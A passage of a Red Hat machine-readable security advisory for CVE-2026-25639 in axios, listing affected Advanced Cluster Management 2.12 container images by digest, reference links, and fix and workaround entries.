"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T14:07:27+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5633"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
